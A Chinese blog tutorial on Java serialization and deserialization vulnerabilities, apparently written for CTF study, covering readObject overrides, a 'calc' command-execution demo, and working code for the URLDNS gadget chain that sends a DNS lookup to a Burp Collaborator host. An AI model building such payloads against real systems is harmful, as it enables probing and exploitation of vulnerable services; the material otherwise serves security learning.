java序列化和反序列化

最新推荐文章于 2022-11-09 18:08:35 发布
最新推荐文章于 2022-11-09 18:08:35 发布
阅读量495 收藏 2
点赞数 4
分类专栏: Java CTF WEB 文章标签: java 开发语言 jvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52585514/article/details/127276700
版权

序列化特性

1.Serializable 接口是java提供的序列化结构,他是个空接口

public interface Serializable {
}

在java里,只有实现了这个接口的类才能进行序列化反序列化操作

2.在反序列化过程中,它的父类如果没有实现序列化接口,那么将需要提供无参构造函数来重新创建对象。

就是如果子类实现了序列化接口,父类没有实现序列化接口,那么在父类对象的属性就不会被序列化,从而在反序列化的时候就是用父类的无参构造函数来初始化父类的属性。

3.序列化和反序列化的代码实现

先创建一个person类(命名不规范,应该大写开头)

import java.io.Serializable;

public class person implements Serializable { //实现了Serializable接口
    public String name;
    public int age;
    public person(){

    }
    public person(String name,int age){
        this.name=name;
        this.age=age;
    }
}

序列化

import java.io.*;

public class serializetest {
    public static void serialize(Object obj) throws IOException{
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("1.bin"));
        oos.writeObject(obj);
    }

    public static void main(String[] args) throws Exception {
        person p = new person("wzx",21);
        serialize(p);
    }
}

反序列化

import java.io.ObjectInputStream;

public class unserializetest {
    public static Object unserialize(String filename) throws Exception{
        ObjectInputStream oip = new ObjectInputStream(new FileInputStream(filename));
        Object obj = oip.readObject();
        return obj;
    }

    public static void main(String[] args) throws Exception {
        person pe = (person) unserialize("1.bin");//将Object类型转换为person类,因为person类的父类就是Object类,所以这样转换没问题
        System.out.println(pe.name+""+pe.age);
    }
}

对上面的2个操作文件流的类的简单说明

ObjectOutputStream代表对象输出流:

它的writeObject(Object obj)方法可对参数指定的obj对象进行序列化,把得到的字节序列写到一个目标输出流中。

ObjectInputStream代表对象输入流:

它的readObject()方法从一个源输入流中读取字节序列,再把它们反序列化为一个对象,并将其返回。

3.一个实现 Serializable 接口的子类也是可以被序列化的

4.静态成员变量是不能被序列化

序列化是针对对象属性的,而静态成员变量是属于类的。

5.transient 标识的对象成员变量不参与序列化

6.Serializable 在序列化和反序列化过程中大量使用了反射,因此其过程会产生的大量的内存碎片

反序列化产生的危害

因为我们可以重写readObject()方法,且在因为一些业务需求,要重写readObject()方法。

可以有如下几种情况造成危害

1.入口类的readObjecti直接调用危险方法。
2.入口类参数中包含可控类,该类有危险方法,readObject时调用。
3.入口类参数中包含可控类,该类又调用其他有危险方法的类,readObject时调用。

以第一种为例

当在person类中加入了

    private void readObject(ObjectInputStream ois) throws IOException,ClassNotFoundException{
        ois.defaultReadObject();
        Runtime.getRuntime().exec("calc");
    }

那么在对这个类的对象进行反序列化时,就不会执行原本的readObject()而是这个类中重写的readObject(),从而执行命令弹计算器。

对反序列化利用的条件

  • 共同条件 继承Serializable
  • 入口类source(重写readObject 调用常见的函数 参数类型宽泛最好jdk自带) HashMap是一个
  • 调用链gadget chain 相同名称 相同类型不停的调用
  • 执行类sink(rce ssrf写文件等等)最重要

URLDNS链

链子基础

HashMap进行反序列化的时候,类里重写的readObject()会调用如下函数

putVal(hash(key), key, value, false, false);

会对HashMap的键调用hash()方法

跟进hash()

    static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    }

可以发现,会调用参数key的hashCode()方法

因为这个key是HashMap的键,所以我们可以找一个同样拥有hashCode()方法的类,来调用的hashCode()方法

URL类存在hashCode()

    public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
    }

跟进handler.hashCode()

    protected int hashCode(URL u) {
        int h = 0;

        // Generate the protocol part.
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        // Generate the host part.
        InetAddress addr = getHostAddress(u);
        ...
        ...
        ...

发现这里调用了getHostAddress()

这个就是对域名进行解析获得他的ip,所以我们用这个方法进行ssrf等攻击

所以就是

HashMap.readObject() => HashMap.putVal() => HashMap.hash() => URL.hashCode() => getHostAddress()

这就是一个简单的反序列化链

demo:

用burp开一个Burp Collaborator client

image-20221012084752936

import javax.print.DocFlavor;
import java.io.*;
import java.net.URL;
import java.util.HashMap;

public class serializetest {
    public static void serialize(Object obj) throws IOException{
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("1.bin"));
        oos.writeObject(obj);
    }

    public static void main(String[] args) throws Exception {
        HashMap<URL,Integer>  hashMap = new HashMap<URL,Integer>();
        hashMap.put(new URL("http://kwkn0946k3fe23x6q2xkihy5iwomcb.burpcollaborator.net"),1);
        serialize(hashMap);
    }
}

执行完会发现,burp上收到了dns请求

image-20221012084922403

**但是!**这个时候我们还没有反序列化为什么就会执行这个呢?

跟进HashMap的put()方法,发现在put的时候就会执行hash()

    public V put(K key, V value) {
        return putVal(hash(key), key, value, false, true);
    }

在看看URL的hashCoed()

    public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
    }

这里他会判断hashCode属性值是不是-1,如果是-1就调用handler.hashCode

同时在URL类里,hashCode默认被赋值为-1

    private int hashCode = -1;

所以就会导致在反序列化前就进行了dns请求,这不是我们想要的

要想办法让这个属性值在被put的时候不为-1,在序列化的时候再变成-1

所以使用反射来修改他的值

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class serializetest {
    public static void serialize(Object obj) throws IOException{
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("1.bin"));
        oos.writeObject(obj);
    }

    public static void main(String[] args) throws Exception {
        HashMap<URL,Integer>  hashMap = new HashMap<URL,Integer>();
        Class urlclass = Class.forName("java.net.URL");
        Constructor urlconstructor = urlclass.getConstructor(String.class);
        URL url = (URL)urlconstructor.newInstance("http://kwkn0946k3fe23x6q2xkihy5iwomcb.burpcollaborator.net");
        Field urlfield = urlclass.getDeclaredField("hashCode");
        urlfield.setAccessible(true);
        System.out.println(urlfield.get(url).toString());//获取属性值
        urlfield.set(url,1);
        System.out.println(urlfield.get(url).toString());//获取属性值
        
    }
}
//-1
//1

这个对象的hashCode的值已经被改变

这样就可以满足我们的目的了

链子

import javax.print.DocFlavor;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class serializetest {
    public static void serialize(Object obj) throws IOException{
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("1.bin"));
        oos.writeObject(obj);
    }

    public static void main(String[] args) throws Exception {
        URL url = new URL("http://ds9gw20zgwb7ywtzmvtdeauyepkh86.burpcollaborator.net");
        //这里设置hashCode 不为-1
        Class urlclass = url.getClass();
        Field urlfield = urlclass.getDeclaredField("hashCode");
        urlfield.setAccessible(true);
        urlfield.set(url,1);
        //调用hashMap的put来设置键值对,这个时候不会进行dns请求
        HashMap<URL,Integer>  hashMap = new HashMap<URL,Integer>();
        hashMap.put(url,1);
        //将url对象的hashCode重新设置为-1,这样在反序列化的时候就会进行dns请求
        urlfield.set(url,-1);
        //序列化url对象
        serialize(hashMap);
    }
}

此时不会收到dns请求

反序列化

import java.io.FileInputStream;
import java.io.ObjectInput;
import java.io.ObjectInputStream;
import java.net.URL;
import java.util.HashMap;

public class unserializetest {
    public static Object unserialize(String filename) throws Exception{
        ObjectInputStream oip = new ObjectInputStream(new FileInputStream(filename));
        Object obj = oip.readObject();
        return obj;
    }

    public static void main(String[] args) throws Exception {
        HashMap<URL,Integer> hashMap = (HashMap<URL, Integer>) unserialize("1.bin");

    }
}

收到了dns请求

image-20221012092944019

v2ish1yan
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
对象的序列化反序列化
terase梅
12-03 929
本文中介绍三种Android中常见的序列化的使用序列化是把对象以二进制的形式写入硬盘或者文件中,这样对象就能存入数据库、文件中或者在网络上进行传输。反序列化是把二进制的对象数据读取出来并还原成对象的过程,这个对象的数据和序列化之前是一样的。使用Serializable方式进行序列化,需要让要序列化的对象接口。serialVersionUID:建议主动生成一个固定的序列号。Idea或者AS中可以通过系统设置,让系统自己生成这个ID,,然后在代码中,点击点击类名:,就能生成UID.如果不主动为这个字段设值,ja
JAVA序列化反序列化的底层实现原理解析
08-25
JAVA序列化反序列化的底层实现原理解析 一、基本概念 JAVA序列化是指把Java对象转换为字节序列的过程,而Java反序列化是指把字节序列恢复为Java对象的过程。序列化是把对象转换成有序字节流,以便在网络上传输...
java基础--反序列化漏洞原理
zyer
05-04 4473
原理 根据上篇文章可以了解到,一个类想要实现序列化反序列化,必须要实现 java.io.Serializable 或 java.io.Externalizable 接口。 Serializable 接口是一个标记接口,标记了这个类可以被序列化反序列化,而 Externalizable 接口在 Serializable 接口基础上,又提供了 writeExternal 和 readExternal 方法,用来序列化反序列化一些外部元素。 其中,如果被序列化的类重写了 writeObject 和 r
序列化反序列化,使用中千万要避开这些坑!
Java知音
07-17 417
点击关注公众号,实用技术文章及时了解来源:liuchenyang0515.blog.csdn.net/article/details/118463573文章目录序列化反序列化的概念子类实...
java序列化反序列化总结
Viyond的专栏
04-13 1887
很多商业项目用到数据库、内存映射文件和普通文件来完成项目中的序列化处理的需求,但是这些方法很少会依靠于Java序列化。本文也不是用来解释序列化的,而是一起来看看面试中有关序列化的问题,这些问题你很有可能不了解。“Java序列化指的是将对象转换程字节格式并将对象状态保存在文件中,通常是.ser扩展名的文件。然后可以通过.ser文件重新创建Java对象,这个过程为返序列化Java序列化的AP
Java Map对象的序列化反序列化
BangLiSang的博客
12-31 2204
import java.io.*; import java.util.Date; import java.util.HashMap; import java.util.Map; public class OffsetUtil { private OffsetUtil() { } /** * 判断文件存不存在 * * @param path 文件路径 * @return 存在是true,否则为false */ public
java序列化反序列化,面试必备
12-21
Java序列化反序列化Java开发中常见且重要的概念,尤其在面试中常常被问及。序列化是指将一个Java对象转化为字节序列的过程,这样可以将对象的状态持久化到磁盘上或者在网络中进行传输。反序列化则是相反的过程,...
Java 序列化反序列化实例详解
08-31
Java 序列化反序列化实例详解 Java 序列化反序列化Java 语言中两个重要的概念,它们在分布式应用中扮演着至关重要的角色。序列化是指将对象转换为字节流的过程,而反序列化则是指将字节流恢复为对象的过程。...
深入分析Java序列化反序列化
12-22
本文通过分析ArrayList的序列化来介绍Java序列化的相关内容。主要涉及到以下几个问题:  怎么实现Java序列化  为什么实现了java.io.Serializable接口才能被序列化  transient的作用是什么  怎么自定义序列...
一文带你彻底理解Java序列化反序列化
09-07
Java序列化反序列化Java开发中常用的技术,它允许我们将Java对象转换成字节流,以便于存储、在网络中传输或在不同时间点重建对象。这一过程对于实现某些关键功能至关重要,如持久化数据、分布式计算和跨进程通信...
Java 多次序列化对象到同壹個文件及反序列化的问题
04-14
NULL 博文链接:https://hanmiao.iteye.com/blog/1740809
Java序列化反序列化_动力节点Java学院整理
08-30
Java序列化反序列化Java编程中的一种重要机制,它允许将对象的状态转换为字节流,以便存储或在网络中传输。这个过程对于持久化数据、跨进程通信以及在网络间传递复杂对象尤为关键。 首先,让我们理解序列化和反...
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
java序列化反序列化1
08-08
Java序列化反序列化Java开发中重要的概念,主要涉及对象状态的持久化以及在网络传输中的数据转换。在Java中,序列化是将一个对象转换为字节序列的过程,而反序列化则是将字节序列恢复为原始对象的过程。 1. *...
java序列化java反序列化示例
09-04
Java序列化反序列化Java平台中一种重要的机制,主要用于将对象转换为字节流以便存储或在网络中传输。这个过程允许我们将复杂的Java对象结构持久化,或者在网络通信、进程间通信(IPC)以及分布式计算等场景下,...
Java序列化反序列化
qq_36095290的博客
03-03 795
Java io 流序列化反序列化) 一、序列化 ObjectOutputStream类 反序列化 ObjectInputStream类 反序列化操作
序列化反序列化(三)——父类的序列化
gaohuanjie的专栏
04-24 2561
1、一个父类实现序列化,子类自动实现序列化; 示例: package com.jd.vo; import java.io.Serializable; public class Father implements Serializable{ private static final long serialVersionUID = 6614009233928674796L; ...
Java 序列化反序列化详解完整版
huangtenglong的博客
11-09 1502
Java 序列化 反序列化
Java反序列化方式_Java 序列化反序列化 的各种方式
weixin_32562973的博客
03-01 423
个人理解,Java序列化反序列化,是指可以把 java 对象持久化后,又可以重新从持久化的数据中生成 java 对象。下面是这些年遇到的一些序列化反序列化方式。1. JDK 自带的流序列化反序列化java.io.ObjectOutputStream 可以把 java 对象序列化java.io.ObjectInputStream 可以把持久化后的数据反序列化java 对象。PS: ...
java 序列化反序列化
最新发布
04-29
Java序列化反序列化常用于网络传输和持久化存储等应用场景。在网络传输中,使用序列化可以将Java对象转换为平台无关的字节流,以便在不同平台的应用程序之间传输数据。在持久化存储中,使用序列化可以将Java对象...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v2ish1yan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值